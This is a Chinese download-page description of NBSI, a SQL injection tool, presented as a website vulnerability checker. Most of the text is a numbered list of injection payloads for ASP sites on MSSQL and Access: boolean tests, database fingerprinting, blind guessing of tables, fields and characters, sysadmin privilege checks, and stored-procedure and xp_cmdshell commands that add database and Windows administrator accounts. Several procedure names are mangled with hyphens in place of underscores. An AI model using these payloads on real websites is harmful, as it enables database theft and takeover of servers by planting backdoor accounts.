nbsi

      nbsi最新版是款功能实用且容易上手的网站安全漏洞检测工具，nbsi最新版基于开源sql注入分析器由VB语言编写ASP注入漏洞检测帮助用户快速检测网站中存在的漏洞并提示修复，强劲切检测结果精准，速度快是网站用户检查网站漏洞修复的必备工具。

功能介绍

      1.判断是否有注入

      ;and 1=1

      ;and 1=2

      2.初步判断是否是mssql

      ;and user>0

      3.判断数据库系统

      ;and (select count(*) from sysobjects)>0 mssql

      ;and (select count(*) from msysobjects)>0 access

      4.注入参数是字符

      'and [查询条件] and ''='

      5.搜索时没过滤参数的

      'and [查询条件] and '%25'='

      6.猜数据库

      ;and (Select Count(*) from [数据库名])>0

      7.猜字段

      ;and (Select Count(字段名) from 数据库名)>0

      8.猜字段中记录长度

      ;and (select top 1 len(字段名) from 数据库名)>0

      9.(1)猜字段的ascii值(access)

      ;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0

      (2)猜字段的ascii值(mssql)

      ;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0

      10.测试权限结构(mssql)

      ;and 1=(SELECT IS-SRVROLEMEMBER('sysadmin'));--

      ;and 1=(SELECT IS-SRVROLEMEMBER('serveradmin'));--

      ;and 1=(SELECT IS-SRVROLEMEMBER('setupadmin'));--

      ;and 1=(SELECT IS-SRVROLEMEMBER('securityadmin'));--

      ;and 1=(SELECT IS-SRVROLEMEMBER('diskadmin'));--

      ;and 1=(SELECT IS-SRVROLEMEMBER('bulkadmin'));--

      ;and 1=(SELECT IS-MEMBER('db-owner'));--

      11.添加mssql和系统的帐户

      ;exec master.dbo.sp-addlogin username;--

      ;exec master.dbo.sp-password null,

      username,password;--

      ;exec master.dbo.sp-addsrvrolemember sysadmin

      username;--

      ;exec master.dbo.xp-cmdshell 'net user username

      password /workstations:* /times:all

      /passwordchg:yes /passwordreq:yes /active:yes /add'